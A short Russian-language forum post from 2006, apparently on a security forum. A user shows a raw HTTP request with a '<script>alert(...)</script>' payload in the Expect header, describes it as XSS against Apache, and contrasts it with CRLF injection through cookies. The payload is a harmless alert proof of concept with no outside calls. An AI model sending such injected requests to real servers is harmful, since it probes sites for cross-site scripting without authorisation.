
22.08.2006, 12:35
|
|
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме: 1095453
Репутация:
113
|
|
Ну имхо щас уже ясно ...
это типа XSS на апаче
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
Host: http://localhost
Cookie: hotlog=1;path=/
Connection: Close
Expect: <script>alert(Electro)</script>
Pragma: no-cache
Разница получился в том что в CRLF injection идет манупуляция с куками
Все! Ясно! Всем спасибо за ответы
Тему можно закрыть
Последний раз редактировалось Electro; 22.08.2006 в 12:38..
|
|
|